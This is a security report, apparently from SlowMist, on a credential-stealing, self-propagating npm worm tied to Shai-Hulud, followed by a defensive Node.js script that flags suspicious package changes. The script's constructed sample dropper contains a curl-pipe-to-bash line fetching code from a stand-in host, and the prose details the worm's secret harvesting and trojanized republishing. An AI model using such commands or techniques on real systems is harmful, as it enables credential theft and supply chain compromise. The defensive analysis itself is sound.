NPM registry hit by a sophisticated supply chain attack to steal developer credentials

The NPM ecosystem has been targeted by a sophisticated supply chain attack with direct connections to the September 2025 Shai-Hulud incident. The malicious packages contain code that exfiltrates developer credentials, API keys and environment variables, then uses the stolen authentication tokens to create public repositories holding the captured data. SlowMist's Web3 threat intelligence platform MistEye detected the campaign and promptly issued security alerts to affected customers. The malicious packages were quarantined and their SHA-256 hashes recorded for identification.

Technical analysis of @asyncapi/php-template@0.1.1 shows the methodology. Compared with the legitimate 0.1.0 release, the package adds two JavaScript files, setup_bun.js and an obfuscated bun_environment.js, and its package.json gains a preinstall script that runs setup_bun.js automatically during dependency installation. Because preinstall fires at install time, before any of the package's own code is imported, merely resolving the dependency is enough to execute the payload.

The attack chain starts in setup_bun.js, which checks whether the Bun runtime is installed, downloads it if absent, and then executes the obfuscated bun_environment.js. Deobfuscation shows that the script first performs environment reconnaissance, detecting NPM and GitHub credentials, and then begins harvesting secrets. It systematically targets cloud credentials on several platforms:

– AWS: enumerates accessible Secrets Manager secrets across regions and extracts every SecretString and SecretBinary value
– GCP: lists all Secret Manager secrets within the specified projects and retrieves the latest version of each
– Azure: scans subscriptions for Key Vaults and extracts every secret they contain

Notably, the attackers weaponize a legitimate security tool, TruffleHog, to scan the victim's entire file system for additional credentials.
The attack self-propagates through an updatePackage() function that uses stolen NPM tokens to download legitimate packages the token is permitted to publish, inject the malicious preinstall script, increment the version number and republish the trojanized package to the registry.

For command and control, the malware uses stolen GitHub tokens to create repositories with randomly generated names and registers the victim's machine as a self-hosted GitHub Actions runner for them, giving the attacker remote code execution through malicious workflow triggers. Exfiltrated data is base64-encoded twice before being uploaded to repositories whose description reads "Sha1-Hulud: The Second Coming".

Security researchers characterize the campaign as combining worm-like propagation with long-term persistence through self-hosted runners, augmented by the weaponization of security scanning tools. SlowMist recommends that developers lock dependency versions and review packages thoroughly before updating them, to limit exposure to similar supply chain risks. Organizations seeking stronger protection against APT campaigns and dependency poisoning can use specialized Web3 threat intelligence solutions for rapid detection and mitigation.
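The change described above (a new preinstall hook plus two added files, one of them obfuscated and one that downloads a runtime) is exactly what a pre-update review can diff for. The following Node.js script is an added example, not SlowMist's, MistEye's or the AsyncAPI project's code: it compares a candidate package version against the previous one and flags those indicators, and it includes a helper that reverses the double base64 encoding the report attributes to the exfiltrated data. The package contents, the `example.invalid` download URL and the obfuscation heuristic (`_0x` identifiers or very long lines) are constructed assumptions for the demonstration, not signatures taken from the report.

```javascript
// Added example (not SlowMist's or AsyncAPI's code): diff a suspect npm package
// version against its previous version and flag the install-time indicators the
// article describes. All package contents below are constructed stand-ins.
const LIFECYCLE_HOOKS = ["preinstall", "install", "postinstall", "prepare"];
// File names reported for the malicious @asyncapi/php-template@0.1.1 build.
const KNOWN_INDICATOR_FILES = ["setup_bun.js", "bun_environment.js"];
// Heuristic: an added file that fetches something at install time. Assumption:
// these are the usual downloaders; the real dropper's exact command is not on the page.
const DOWNLOAD_PATTERN = /\b(curl|wget|Invoke-WebRequest|bun install)\b/i;

// Heuristic obfuscation check (assumption, tunable): javascript-obfuscator style
// _0x identifiers, or a single very long line.
function looksObfuscated(src) {
  const hexIdents = (src.match(/_0x[0-9a-f]{4,}/gi) || []).length;
  const longestLine = Math.max(...src.split("\n").map((l) => l.length));
  return hexIdents > 5 || longestLine > 1000;
}

// candidate / baseline: { manifest: <parsed package.json>, files: { "path": "content" } }
function auditPackage(candidate, baseline) {
  const findings = [];
  const flag = (rule, detail) => findings.push({ rule, detail });
  const scripts = candidate.manifest.scripts || {};
  const baseScripts = baseline.manifest.scripts || {};
  const baseFiles = new Set(Object.keys(baseline.files));
  const addedFiles = Object.keys(candidate.files).filter((f) => !baseFiles.has(f));

  for (const hook of LIFECYCLE_HOOKS) {
    const cmd = scripts[hook];
    if (!cmd) continue;
    // A lifecycle hook that did not exist, or changed, between versions.
    if (cmd !== baseScripts[hook]) flag("new-lifecycle-hook", `${hook}: ${cmd}`);
    // A hook that executes a file this version introduced.
    for (const f of addedFiles) {
      if (cmd.includes(f)) flag("hook-runs-added-file", `${hook} executes newly added ${f}`);
    }
    for (const f of KNOWN_INDICATOR_FILES) {
      if (cmd.includes(f)) flag("known-indicator-file", `${hook} references ${f}`);
    }
  }
  for (const f of addedFiles) {
    const src = candidate.files[f];
    if (KNOWN_INDICATOR_FILES.includes(f)) flag("known-indicator-file", `added file ${f}`);
    if (f.endsWith(".js") && looksObfuscated(src)) flag("obfuscated-added-script", f);
    if (DOWNLOAD_PATTERN.test(src)) flag("runtime-download-in-added-file", f);
  }
  return findings;
}

// The report says exfiltrated data is base64-encoded twice before upload;
// this reverses that for triage of a suspect repository's contents.
function decodeDoubleBase64(blob) {
  const once = Buffer.from(blob, "base64").toString("utf8");
  return Buffer.from(once, "base64").toString("utf8");
}

// Constructed sample: a clean 0.1.0 manifest and a 0.1.1 that adds the two files
// and a preinstall hook, shaped like the change the article describes.
const SAMPLE_BASELINE = {
  manifest: { name: "@asyncapi/php-template", version: "0.1.0", scripts: { test: "jest" } },
  files: { "package.json": "{}", "index.js": "module.exports = {};" },
};
const SAMPLE_CANDIDATE = {
  manifest: {
    name: "@asyncapi/php-template",
    version: "0.1.1",
    scripts: { test: "jest", preinstall: "node setup_bun.js" },
  },
  files: {
    "package.json": "{}",
    "index.js": "module.exports = {};",
    // Constructed stand-in for the dropper: check for Bun, fetch it if missing, run the payload.
    "setup_bun.js": [
      'const { execSync } = require("child_process");',
      'try { execSync("bun --version"); } catch (e) { execSync("curl -fsSL https://example.invalid/install | bash"); }',
      'execSync("bun bun_environment.js");',
    ].join("\n"),
    // Constructed stand-in for an obfuscated payload (array of hex-named identifiers).
    "bun_environment.js":
      "var _0x1a2b=[" +
      Array.from({ length: 40 }, (_, i) => `'_0x${i.toString(16).padStart(4, "0")}'`).join(",") +
      "];",
  },
};

for (const f of auditPackage(SAMPLE_CANDIDATE, SAMPLE_BASELINE)) {
  console.log(`[${f.rule}] ${f.detail}`);
}
```

In practice the two inputs come from `npm pack` of the pinned version and of the proposed one, unpacked and read into the same `{ manifest, files }` shape. Because the dropper runs from a preinstall hook, installing with `npm ci --ignore-scripts` (or `ignore-scripts=true` in `.npmrc`) blocks this particular execution path outright; the lockfile review the article recommends is what catches the version bump before it is ever installed.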
